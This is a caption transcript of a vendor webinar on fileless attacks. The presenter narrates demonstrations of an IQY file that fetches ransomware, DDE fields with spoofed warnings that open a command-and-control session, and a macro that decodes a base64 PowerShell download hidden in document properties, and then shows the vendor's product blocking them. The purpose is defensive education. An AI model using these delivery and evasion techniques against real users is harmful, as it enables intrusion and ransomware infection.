Webinar: Stopping Fileless Attacks with BlackBerry Cylance

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

good morning good afternoon thank you everybody for joining our webinar today on fireless attacks and how to stop them my name is Brian Robeson I'm the chief evangelist here at blackberry silence and I would love to welcome you all to today's webinar let's go ahead and get started on content I think today is gonna be kind of fun I've got a couple of different things that we're gonna take a look at and as always if anybody has attended any and Stewart McClure is hacking exposed or any of my other webinars that I do I spend as little time as possible in slides and spend most time looking at technology and doing things live on the screen one word of warning as always we are messing with live attacks today things that happen on the screen may happen that aren't planned or have not you know occurred during rehearsals or anything else so please bear with us if we have any issues that happened all right so let's just go ahead and move in today our agenda it's pretty simple we're gonna basically just have I think that I only have maybe two slides what is a file s attack and why do they matter and then we're gonna jump in and actually do hands-on playtime and I think this is one of the reasons why a lot of you come to my webinars is I spend most time actually showing these techniques and how they will arm it rather than just a talking head lecturing to you about the importance of these attacks and what they are and things like that so as always I love to get my hands dirty and that's where we're gonna spend the majority of the time today so once again if you have questions for those of you who just joined in if you have questions please do enter those in the QA widget at the bottom of the screen I will attempt to get to them as fast as possible and yes I do see the typo on the screen where I forgot my question mark I'm sorry about that okay so quick agenda that's what we're gonna do today it's gonna be very basic like I said we're gonna spend just another minute or two here in the slides and then we're gonna go play because I think that's that's where we're gonna learn the most what our fireless attacks and why do we keep hearing about them in the news what are they how are they different from you know kind of a traditional malware based attack well really simply they they kind of fall into four major gouri's whether their memory resident script-based the exploit resources or they attack the system registry but the main goal here with a fireless attack different from a traditional kind of malware attack is that the initial vector of the attack is not an executable file it's not an exe it's not a dll it's usually a script it's usually something that runs it's designed to bypass a lot of the of Asia or that it's had detection technologies that are out there initially it also doesn't necessarily write files to disk so it's not going to trigger a lot of the traditional detection methods especially traditional AV because it's looking for file rights and file reads and things like that so those types of behaviors are kind of what define the world of the you know the file s attack again their initial there used mainly in the initial phases of the attack so at some point the attacker is going to have to execute code on your machine to do something to take over a process or to do to do something so sometimes that can happen in a script and sometimes it's gonna need some sort of executable or something like that or their goal is to gain command and control and then to download some malware and ransomware system or something like that but that's the end phase so the exe that gets downloaded from their situ and gets executed that's usually at the very end after they've done all their recon and and things like that so at least in the initial phases of the attack there are not executable files of being used now that's not to say that these attacks don't ever come from a quote file the most popular type of file that these attacks begin from is actually a malicious document of some sort PDF word doc Excel PowerPoint whatever it is it's usually a weaponized document so to call it a completely file s type of an attack is not really true it starts from a in most cases but that file is simply not an executable file which we can block with just about any basic technology blacklisting whitelisting even stuff like that now sometimes there are what we kind of see as zero day exploit based types of attacks and these attacks are gonna attack potentially an exploit that is publicly facing let's say right so let's say you know you go back to cross-site scripting or sequel injection right a specially crafted string sent to a web server could cause an exploit to happen and then give that user some ability to access the system but those types of attacks like that are somewhat rare and generally I mean that you know the vast majority of these quote fireless attacks traditionally start from a file but it's usually a weaponized document and definitely not an executable or something that's going to cause your AV engine to scan now the other thing is I also say that generally these are designed to live off the land so the reason fireless attacks are successful and work is that there are a lot of very powerful tools on our workstations these days and on our servers that these attackers can use without having to put their own technology down on that box so the less they have to put on that box the chances of detection go down even more so the less they have to change or the less they have to bring down to the system and execute in memory things like that the less chances of attack detection so they're going to try to use live off the land techniques they're gonna use PowerShell they're gonna use cert util they're gonna use tools that exist on the systems that are generally already trusted by the system and that's essentially how these succeed okay so very very very quickly we're gonna look at some statistics and basically try to say hey why do these attacks matter so in a recent survey fifty-four percent of the companies surveyed experienced a compromised and 77% of those who experienced a compromised were basically resulted in use of a file as technique so rather than USB droppers with Exe Zana more just emailing exceeds which all of you know doesn't really work anymore most of these people were were actually attacked successfully with file s techniques so as a result we're seeing the incidence of fireless attacks rising significantly over the past year or two to me and kind of a shameless plug here for silence I think that a lot of this is due to essentially the effectiveness of tools like silence that can actually predict and prevent just files from being executed and so we see the incidence of file based attacks declining because of the effectiveness of tools like silences pre execution using machine learning that actually can you know prevent better than 99% of unknown files that are bad from executing so yes there are still hundreds and hundreds of thousands of samples of malware created on a daily basis traditional executable malware the problem is is with technology that exists today like silence the effectiveness of those exe s is a lot less so at obviously attackers are moving into different realms and one of those is fireless techniques okay a couple of notable examples recent examples and how we're gonna actually kind of tee up the demos we're gonna do today we're mainly going to be looking at apt 32 techniques today and we're gonna actually go through and reproduce some of these techniques now for any of those of you who have have watched the hacking exposed webinars or got a chance to see us live at RSA this year one of the things that I do with these attacks is when we see them and we investigate them we've been called into companies to stop a compromise or something like that or clean up after an incident is we reverse engineer kind of those those attacks and how they got in and what the initial vectors were and things like that and then I try to recreate those into tools that we can all use on a daily basis not just for our own education but also to test the effectiveness of our tools and techniques to defend against those types of attacks so the tools and techniques and things today that I'm gonna show you are based on the techniques of apt 32 also called ocean Lotus and we're gonna take a look at a couple of different things pretty much they're all kind of script based attacks but there's different ways to launch them in which the code and the stuff that's running never actually gets saved out to disk it always gets executed directly into memory and that allows us to participate in a kind of a non detectable type of environment so we're gonna take a look at using a couple of friends that I've used before we're gonna look at iqy files and dde and I'll talk about D de fer and when we get to that demo and then on the third demo we're gonna actually go create and deliver a command and control infrastructure using a crafted malicious document based upon apt 32 techniques and the cool thing about that document is you can actually build it cross-platform it can work on Mac and PC so it's a lot of fun okay it is time to play so let's just go ahead and jump right in and again questions if you have them please do enter them in the Q&A widget at the bottom of the screen and I will try to get to them throughout this demonstration I've got a couple of victim systems and we want to start with our third victim system here okay so our victim systems are just a standard Windows 10 these are 1809 s Enterprise Edition and we've got some of these you know just files sitting out here on the desktop for example you can see my cows you're chewing on a pallet there's there's just some files sitting here and the reason I have these files sitting out here is to basically simulate kind of a real-world desktop you've got some work documents you've got some PDF documents on here you've got you know all kinds of fun things you got office installed PDF document so this way we can kind of see as some of the some of these attacks were actually gonna deliver some malware and try to destroy the system again after we get a certain distance through the attack so the first example we're gonna take a look at is a file type called iqy now an iqy file and again this is something that is and it's still being used but a lot of users are pretty darn familiar with things like how to work with attachments they see XLS attachments or zip file attachments or things like that all the time now this this interesting one that came out last year is called iqy and so basically attached to the email is an iqy file so we're gonna download this and then we're gonna open this in a folder the reason this file is interesting is that it is a Microsoft Excel file but it's an older file designed to query the web or a data service directly and pull data into the excel file and it hasn't really been used in a long time so basically when apt 32 began using this a lot of the users in the world essentially essentially weren't understanding what an iqy file was you know so it looked kind of normal to them now the cool thing is it will open this with notepad if you statically examine this file this is all that is in it it's it's really kind of creepy in that you know let's say you've got a gateway based you know AV product or something but instead of delivering the malware or they attack directly in the actual file coming through your gateway file this attacks utilize the ability to hide things and come through the gateway without really anything malicious in the file itself so again this is this is the only thing that's in this file it basically is the URL that's gonna open up and when Excel executes this thing it's gonna open up this fire this URL and download this file so first thing we're gonna do I'm gonna go show you what this file like so what this file that it's gonna download is is actually a field that's going to enter and execute a command shell directly in Microsoft Excel but it's gonna be a PowerShell command and it's gonna download essentially from the same site it's then gonna go download this file called one dot dat now I've left this command in clear text so that you can kind of see what's happening here but it's also very easy to do this with a base64-encoded command or something like that to obfuscate it so that as it transits firewalls and scanners and next-gen you know tools that are looking at the content it's very very easy to hide this from view and we're actually gonna take a look at some of those techniques and in the third demo so one dot dad is essentially going to come in and it's gonna download one dot sorry 1 dot dad so two dot dat comes in first then it downloads one dot death one dot dat is actually where the magic kind of happens so basically we set a variable here and we're gonna go this one is a is not necessarily a great example of file s but at least in the initial vector it's all completely quote file us so with this one it's gonna be very simple we're just going to execute this PowerShell command that goes and downloads this this file and then this one executes and it's gonna simply download this exe and execute it so let's go ahead and take a look at this one how it works when it runs I've always liked this one because of the fact that this iqy file a lot of people don't really understand what this is and it's not going to pop up the normal kind of yellow warning bar enable macros kind of thing that a lot of our users have been trained on so there are several different techniques and the three different demos today I'm going to show you three different Microsoft error messages that your users might not ever really recognize and that's kind of the the key of this attack as well so you obviously do get a warning that pops up the thing is is it's not really the traditional warning that user might expect so you know if the social engineering is done well where they you know basically say a this is okay you can clicked on this or if they send it from a trusted source I mean how many people today click on the enable macros even though they know they're not supposed to so if you can trick up that situation a little bit then you can actually get users to click on these things more often so obviously data connections are disabled but we're gonna go ahead and enable them it's downloaded the first command and it's now actually going to execute the second command so as you can see you know this is really just kind of the entire excel file is just in this one field but you can see it went and grabbed this and it downloaded it but again there's nothing malicious even in this command that could be picked up the actual magic happens when this file gets downloaded and executed in the background so it's basically happened and if we close Excel yeah it can't find the file anymore because that bad news for you file was actually one a cry that got downloaded and encrypted this system so you know this is a good example of delivering a very bad payload aka one a cry with an initial vector that is completely fireless there's no executable malware there's you know all that good stuff we would normally be able to detect is simply not there so one a cry is gonna be busy doing its thing but we're gonna put it out of its misery and we're gonna recycle this system back to the demo gods and let it reset so while that happens we are going to flip into our second demo again if there's any questions for folks please do enter them in the Q&A okay so the second example we're actually going to once again we're going to our goal with file s attacks is really to exploit the user right we're trying to get them to do something that they normally wouldn't do and a lot of that is going to be around social engineering on a specific thing so in this example what we're gonna do we're gonna take this resume document sitting out here on the desktop and we're gonna open it and this document actually does have a macro in it we've used this document before in previous webinars so you've probably seen this before but what it does is is this gives you your standard you know end user warning however we just click enable content and in this document it's actually a legitimate macro that simply updates the fields in the document based upon your you know Active Directory login name so this is an example of a good use of a macro and is also an example of why you can't just simply disable macros in a lot of business environments that do use legitimate purpose macros we're gonna use this document a little bit in the next couple of demos and this is kind of kind of be fun but in this example we're gonna take a look at something called dde and that is basically an old Microsoft feature that still exists that allows you to dynamically link data into your documents from public sources now Microsoft did release Microsoft Office fix the disabled dde across all of the office platforms however based upon feedback because it just did destroyed customers data and their documents or anything else they issued another patch which only disables it in Microsoft Word so it's still active in Outlook it's still active in Excel it's still active in PowerPoint etc and then I have in this system it actually turned it off again for word but that's just so that we can do this type of demo so again it's something that you know if you want to turn this off across your entire organization you can't rely on the simple Microsoft patch you're going to have to actually turn this off with registry keys that are deployed through group policy or something like that so to use this one this one's kind of fun but again the reason I like to show this one is because of what we can do with the actual error message so what I want to do is I'm just gonna come down here and I'm gonna just replace this here right here at the end of this sentence this word sentences I'm gonna replace this and I'm gonna put in this field we're just gonna put in an empty field now this field we can delete the majority of this text here and so basically if you look at this document now they just have an exclamation point in here however if you hover over the exclamation point you'll see the very very tiny gray field in there and now we can toggle the field codes to actually get into the actual code that's in this field now I've created this already for us this is kind of interesting I love using this one because it's kind of a fun example of how this works so the first thing we're gonna do is we're gonna put in the word dde Auto and that's a keyword that allows us to execute this and again we're simply going to execute a PowerShell command but this time we're gonna actually go download a ps1 script to our command and control server and execute it directly into memory so we're not going to download the ps1 file to disk and execute it we're gonna execute it directly in memory so we're gonna use in the part that's missing is the ability to actually modify and change the error message that pops up on the screen now most attacks you have to deal with Microsoft's error messages but this one has a very specific way of invoking it for example we can put in some text up here at the front that makes it look more legit in the fake past this is actually a fake pass but to the user it's gonna look legitimate and then we have this word down here at the bottom called blah and we can simply replace this with allowed by your security department okay now the reason I'm going to do that is because this text is actually going to be popped up into the error message that is gonna come up from this document and this is the scary part of this so all we're gonna do is simply save the document and we're gonna reopen it and you're gonna get you know these kind of warnings right document contains links that refer to other files but this again is very common so you click yes and in this case you see the remote data and you can see the actual message that you typed in allowed by your security Department is not accessible do you want to start the application and then you can see that fake path that I typed in and now there's certain amount of characters you can type here and a certain amount of things but if you spend a little time with this and play with it you can actually create a situation where you've actually created something that looks like in an acceptable error message so specially crafted social engineered email along with some specially crafted social engineered microsoft word error dialogues again you know raise the chances of your victim potentially executing this file now so we've got our command and control sitting back here in the background and i'm gonna go ahead and start this up so you can kind of see what happens first thing we need to do is we need a simple Python web server here this is gonna serve up the initial ps1 file for there for our malware to go download or for our attack to go download and then we're going to have our PI our Python command and control here listening for a connection back ok so if this attack runs what you should see is it'll download the file the ps1 file from here and then you'll see a callback and a successful connection back into the Trevor c2 command and control on this tree now the interesting thing is and sometimes this works and sometimes this doesn't but even if the user doesn't like this error message and they hit no I seen several times where this actually works and the command actually gets executed so we're gonna try it anyway so if the user hits no and then they hit OK they hit no and they hit OK yeah it didn't work this time but I have seen this actually work it's okay so we're gonna close that and we'll reopen it sorry about that like I said I've seen some times where even hitting no it causes that to actually happen so we're gonna we're gonna proceed so we're gonna click yes and this time we're gonna hit yes because again it's allowed by our security department did I screw things up oh no it actually did work the first time darn it so it actually did work the first time when I hit no I just had I just had my scroll stopped on my SSH shell so it didn't we didn't actually see it happen I want to do that again so you can see that I apologize but I just this is this is kind of critical and I love seeing this actually happen a good indicator for this one is that there probably is going to be PowerShell running in the background yeah we actually have two shells cuz we actually successfully executed it all right and I'll say yes to this field here but we're gonna say you know I don't like this I don't trust this I want to ask somebody about it on a hit no okay no okay is it gonna work maybe not did I screw it up again no okay I must have done something wrong so we'll go back to the yeses I'm sorry guys it must have been a yes like I said I have seen this work before where you do hit the no and it does actually connect but we actually got it connected twice here so so we see it downloaded we can interact with the session we actually have a connection to our victim system here and we can begin using our remote command and control to do things like task kill I am EXCI force you know so we can actually send and communicate with the endpoint so this is a good example of being able to get past a lot of your user training with specially crafted error messages that our users are normally not going to ignore ever have a higher chance of getting in through our our attack with that type of method okay so the third demo this one I think you guys are gonna like this one's a little bit fun and first thing we're gonna do is we're gonna open up some tools here to keep an eye on some things so we're gonna need that and let's see I need to get back over here cuz I'm not gonna want this Trevor anymore alright and actually we're gonna just recycle that one to the demo gods as well okay so in this demo environment what we're gonna do is we're gonna basically kind of do the same thing we're gonna SSH into our Kali box that has our Trevor client get our simple web server setup here and then we'll get our see to set up all right so that's the basic setup now what we're gonna do minimize those and get those out of the way so again we're gonna use our legitimate document that has a legitimate macro in it but what we're gonna do is we're actually going to replace that macro and oh cool we have some questions I just popped back yes yeah I can put these files make them available to you at the end of the webinar today I'm gonna give you my direct email address and everything so if you want these actual you know files I have no problem sending them to you including even this nasty vbscript that we're gonna just use here in a moment so we'll have a little bit of fun with this but there this will allow you to test these things kind of in your own environment okay so this one's kind of fun to follow so let's take a look at this and again we're going to enable the content because it just uses a macro to to up to update our username into our macro so it's very simple this is all it does and again this is not a malicious macro in any way shape or form it's just gonna update those fields so let's say with this file that our users in our you know company are expecting this to have the enable macro warning because it's general behavior for our environment however what we're gonna do with this one this is where things get a little bit fun I don't know I I have a real weird sick sense of humor I guess I think playing with things like this are fun we're gonna take this VBA code now this is some VBA code that is based upon apt 32 techniques I have modified it substantially so that it actually does work better on both platforms but basically there's nothing malicious in this VBA code that can be picked up from a maduk scanning standpoint okay it's difficult to determine if anything bad is gonna happen with this because there's nothing in here that is really detectable in being executed but basically what we're gonna do here you can see here this very very simple if-else statement what this does is it determines which platform it's running on I showed this a little while ago a few months ago I guess where we actually use this also to take command and control of a Mac system but this is a true cross-platform VB script and so today we're gonna execute it on a PC but what it's gonna do is it's gonna get the bad string from the company name in the properties field of the document and it's gonna be a base64 encoded string so it actually has its own base64 decoder built directly into the macro now this is this is one that we saw again apt 32 using very successfully to attack targets in Asia and so it makes life interesting so what we're gonna do is we are simply going to save this document because we're gonna now create our string so again in the document in the actual document file itself there is actually nothing malicious there's no PowerShell commands there's not even a cmd.exe there's there's nothing there so we're gonna use the same kind of PowerShell command we used from before and this is your standard you know out-of-the-box PowerShell command powershell one-liner this is like the most simple definition of a powershell one-liner command you're gonna exit you're gonna download this file a PS one and you're gonna execute it in memory now the interesting thing is and let's say this is something this this is where we're gonna go a little wild today I'm sorry that I did not practice this so this may or may not work so what we're gonna do is we're gonna go download this ps1 by hand all right so we went to the web server and we downloaded the ps1 so here's the ps1 itself now if we actually just go to a command shell and like I said this may or may not work I hope it does we should not be able to just simply execute the ps1 from the command line because we don't really have oops I'm sorry my brain is not working it needs the path we should not be able to do this because the default execution rights on a Windows system disable the ability to just execute any untrusted ps1 so again you simply just can't download the ps1 and double-click on it and execute it because of the default execution rights however if you execute the PowerShell from Microsoft Word for some reason the execution policy doesn't apply so this again is a technique that their attackers are using there's there's a bunch of different ways to bypass that very simple execution policy on a Windows system now what we're gonna do we're gonna obfuscate this command because let's say you know we are using a public URL in here and if we put it in the document in clear text let's say you know an anti-spam gateway or something could see that URL and determine that it's a bad URL and and then not allow it that kind of stuff happens all the time so all we're gonna do is use this tool called cyber chef very cool tool by the way plus you can download an offline version of it and keep it on your system we're gonna simply convert this string this PowerShell command into a nice little base64 encoded string that doesn't real show up on any sort of scanner now we're gonna take the output we're gonna copy that and we are going to we don't even have to open our resume we just are going to go into our properties field and we can go into the details and again for PC we paste the command into the company field if it's a Mac we paste the command into the comments field so in fact I actually have this is the Python command here that you can run on a Mac to actually go download the to actually go download The Trevor client from the server now you have to put that command base64 encoded into this command here that it's called a wrapper so that it can you put that 60 base64 encoded code into here and then you base64 encode this entire string into a bigger thing and then you paste that into the comments field of that document and you'll have a Mac version that will actually execute the Python version of The Trevor client so again I don't have to open this document this is weaponized right now I could email it to somebody and they would be able to open it and actually have something very very bad happen on their system so in fact because I have already saved this document with macros enabled I think we're gonna probably execute this upon load and it's actually going to yield connection into our c2 so you can see here we we now have a connection into our c2 what we're going to do we're actually going to stop that connection and we're gonna kill the powershell command running in memory because i want to show you how this thing actually works so it works all I had to do was paste in that base64 encoded command and we got a command shell but this is I like showing this because this is the this is the part where you know I get into the reverse engineering and this is actually kind of fun to do we're gonna view locals window and this is gonna allow us to watch the variables as they get created all right so now we're gonna run debug and we're gonna step into the VB okay so you can see there the highlighted text in the in the top we're gonna start stepping through the variables list here sorry locals we need locals not watches I'm sorry okay so we come down here and we've actually got two variables created found value and a real straight right now they're empty so when we execute this command it's gonna go pull the value from the document properties in the company field so think about all those different fields that where you could put commands and things like that you can actually use your VB script to pull those commands in and execute them at runtime only so we're gonna continue stepping through and so now you basically here at the bottom you can see the base64 encoded string getting pulled in to memory and stored in that variable okay so next we're gonna go and actually do a base64 decoding so it has its own little library in here it's gonna just start kind of running through so it pulls the string in and then it's gonna start running through this loop a hundred and seventy three times now I'm just gonna run through the loop a few times you can see here's just running through the loop and it's base64 encoding as it goes and you can start seeing this variable here which is s out so string out so string out as you can see here it's developing powa as we go through here now I'm gonna hold down the key for a minute and you're see it just kind of churn through and start decoding that string see how that's working it's just going through and it's just continually decoding that string now that could take a very long time if it's a very long string so what we're actually gonna do is we're gonna put a breakpoint right here on our VB script and then we're gonna hit one key to resume and let the computer finish decoding that string as fast as it can so we're just gonna hit run bang okay so there that's how fast it completed and you can see it scan reconverted that base64 encoded string back to the actual powershell command okay so now we're gonna step we're gonna now take that value and we're gonna bring it back and put it into the real string that were then going to execute on the windows system so then again we step again we take that string down and this is where we actually run this and that completes the macro and we should now have another Trevor connection down here on our screen so once again here we have a connection to a different victim system that is done with a malicious macro that is really highly obfuscated and is very easily bypassing you know the different detection techniques that are out there so the last thing I want to do is I want to just show how silence does with this and then we're gonna get to the questions I see a few more have popped in so we're gonna take our resume we're gonna put it over here in our Dropbox so the first thing we're going to take a look at is the IQ I filed the IQ Y file sorry and we're gonna download this file just like we did on our victim system and we're gonna bring it up and just like on our victims system this file basically you know when you run it it launched Microsoft Excel and you're gonna get your standard security warnings so just like with our victim we're gonna go ahead and enable that and then we're gonna go ahead and execute allow it to attempt to download and very very quickly what we see here is we get a silence optics detection but more importantly we actually see Microsoft Excel closed in the background and this is due to the active response capability that silence optics has in its ability to actually automatically respond and do something on your behalf instead of just kind of uploading the different bits of information to the console and letting you have to try to make the decision silence optics is preventative technology as well that allows you to actually set up a rule and respond immediately taking action on that asset depending on what rules you have set so let's pop over and actually look in the console at what actually optics saw during the execution of the iqy file so we started at our dashboard and we look at our silence optics detections that have occurred and you're gonna see a whole bunch of detections in here that are basically using the environment and detecting what's happening on the system I mean obviously there are multiple rules here that are being displayed there is kind of this initial dde rule that's displayed we also get a machine-learning hit with a one-liner command which is also basically the powershell download command as well as the powershell malware kind of rule hits so these two rules the fireless powershell malware and the powershell download are individual rules based upon the syntax of the commands trying to be attempted as an example the machine learning module is a newer module that a newer rule essentially that has been built into the system and it's basically built in machine learning so it's learned from millions and millions of different files file less PowerShell commands PowerShell download commands etc and we've actually built a world using machine learning to actually allow science optics to respond with a rule based in AI rather than rules that are based upon you know basically you know syntax pattern matching or text pattern matching like file show file US PowerShell malware rules so essentially the one-liner ml module rule can essentially replace these other individual rules but I have them all turned on right now so if we go in and we look at this we can see we'll look at the dde interpreter one first and so basically this is looking again at you know an office product essentially trying to launch powershell or command the XE or whatever and we do see for example here Microsoft Excel attempting to launch command exe and command exe you'll actually get to see the actual command that was trying to be downloaded using the iqy and remember that the iqy attempted to download the one dot DAT file so this detected this it stored the evidence here for you to review later but it also successfully terminated the process and then Microsoft Excel was also successfully terminated because we told the system to respond by terminating the process and essentially the process tree that was there based upon the detection we can look at the one-liner ml and again we have similar concept here we have Excel launching command exe again with this command the ml rule also saw this command being bad and unfortunately it failed to terminate the process because basically the process was already dead so the very first hit the dde rule hit actually terminated command exe and Excel exe so while this rule was configured basically to to also respond by terminating the process it was unable to because the process essentially was already gone so the PowerShell rule here as well this one did because we actually had command exe launched PowerShell because of this command here you can actually see this one because we're using the standard kind of new object web client download string pretty darn easy to tell that this is actually going out there and doing a PowerShell download so basically you can see here that the rule is built looking for very specific strings in the output again this one was able to kill the powershell exe process and basically the combination of all of these things happening in the background terminated that attack from actually succeeding so let's switch back to our endpoint system and then let's try the same thing with our resume now we've got our resume that's here on the desktop and this is the one basically the quote original one that we started off with with the enable macros yellow warning just like we always would get and if we hit enable content we properly get our fields updated just like we would expect to with this valid macro now let's go grab the the one that we put in our drop box and the drop box one replace the existing one is the one where we implemented that macro vbscript into this document that is actually now different and it's going to execute that code that we encoded into base 64 and put into the comments field so let's go ahead and launch this file and very quickly here again you're gonna see that script control is actually stepping in and stopping that macro from executing which is good it's exactly what it's supposed to do and and it's supposed to do that so there's one thing I would love to do really quickly here I would love to go and turn off so this is using a standard demo policy that's got all the stuff turned on what I actually want to do is I'm gonna go to this system and we're gonna put it into a policy group whereby script control is actually turned off so we're gonna turn off script control and we're gonna see what optics is able to see if we do actually allow these scripts to attempt to run so let's check for our policy update and we'll check our about box and make sure yep we've got our script control off policy so now script control is in a kind of audit only mode meaning it's going to potentially see the script run but it's not going to stop it so it's probably gonna just alert on it so let's try our resume again all right so in this case we actually saw the script attempt to run you can see down here in in the script control that it detected a malicious macro script but again it didn't block it as it did before and we actually allowed silence Optics to come in and do the actual detection and as you see here just like with Microsoft Excel Microsoft Word actually just closed because we've actually told it to kill all the processes associated with that with that stream of vents and thereby you know protecting the system from being compromised so once again we'll flip back to our console we'll come back in here and we'll get to see you know once again we've got you know quite a few hits here we've got the script interpreter trying to be launched from Microsoft Word and then of course we have the power shell or the one-liner command that came in and we can see that actual command that was attempt did we the computer gets to see it as non obfuscated base64 so you know it gets to actually see the attempt to run that so that evidence is captured for you not just the base64 string but the actual command that was attempted to be executed and again here you can see you know word launched PowerShell and by that behavior and that command that was being attempted those processes were successfully terminated and the system is not compromised so that's very quickly how basically silence protects silence optics all that silence technology on that endpoint is defending against those types of attacks file s as well as you know file based attacks but whether it's a obfuscated command or anything else like that it's very easy for silence to actually stop and prevent that type of event from from occurring so okay that's about it for seeing how silence does and if you have questions please do and enter them in a couple questions around how does silence you know scan files for example does it scan them as they're being received or whatever so silence protect as it scans you know executable type files has two capabilities it has what's called background threat detection and it has what's called file watcher so background threat detection is something that runs slow and slow in the background when you first install the product and it looks at every file and every process for malicious information if you find some it quarantines it file watcher is kind of what you were asking there chris is as you receive a file or put it on copy it over or whatever it queues it up for a scan in the background if you immediately attempted to execute the file before that file was scanned in the background if you attempt to execute it it will pick it up with pre execution so if you process like PS exec or something else attempts to execute it then you will it will be quote scanned by 5i silence now optics doesn't actually scan anything it it's it is our you know detect and prevent type product where it is detecting things that are happening real-time in memory as well as commands that are being issued and behavior of applications and things like that so it's it's EDR but its EDR with a prevention for strategy backing it so it's designed to stop the bad things from happening and then you get all of the good evidence that goes into into your console to be looked at and I I don't know what's going on with my demo rig today I apologize for that but for some reason those those it's not it's not functioning properly I will spend the rest of the day debugging that and figuring that out for our next webinar but if there are any more questions please feel free to enter them into the Q&A I'd be happy to answer them I would love to answer them for you I think we've covered most of the questions that are in there yeah so if the threat is not stopped by silence if it's not a pre execution threat or something like that the optics is an EDR so it is a flight data recorder it's going to record all of the things that happen so network connections file is created all that kind of stuff is is available to to be there to actually stop that and just really quickly what I can do is I can kind of show you what that looks like so if you look at the detection rules that are in here let's say you know we look at a bunch of minor ones for example so an office dde document we can monitor for it and then we can actually take a real real-time response not just upload it to the cloud or anything else like that wait for humans but we could actually take a proactive prevention technique and stop stop the processes so that's what I was doing here was I configure it to terminate the process any children processes that have happened and pop up a notification window we could also log off users we can dump the detection to the local disk and we can even then respond with an entire playbook of responses let's say we want to upload some commands we want to upload a script execute some commands gather some data and throw it off into a an amazon s3 bucket if you want for data collection for evidence collection all of that becomes available with with optics not just the flight data recording but actually the actual prevention of the attack and then based upon the evidence there so yes we have some what we call EDR only systems in the demo environment where we execute malware and watch what optics can see it's kind of fun to play that's a good playground so okay we are at the top of the hour and I do appreciate everybody hanging out with us today learning about how fireless attacks are created I did want to provide you here is my contact information feel free to take a screencap of that or you're going to get a copy of this deck as well so please feel free to reach out to me directly and I would be happy to send you those text files that have the PowerShell commands and things like that obviously there are some other back-end requirements that you're gonna need to set the you know the Kali server with with Trevor and all the other kind of stuff but be happy to help you guys set up your kind of own you know hacking exposed virus you know testing lab kind of stuff definitely like helping folks do that so please feel free to reach out to me and I will be available to help you and work through those thank you very very much I really appreciate it and take care and have a great day thank you so much

Info

Channel: Cylance Inc.

Views: 658

Rating: 5 out of 5

Keywords: BBCY, BlackBerry, Cylance, BlackBerry Cylance, Cylance Inc, Cybersecurity, Security, Antivirus, AV, anti virus, Black Hat, worm, trojan, ransomware, demo, malware, next gen, Stuart McClure

Id: RW4ltLxKTrU

Channel Id: undefined

Length: 57min 16sec (3436 seconds)

Published: Tue Jun 11 2019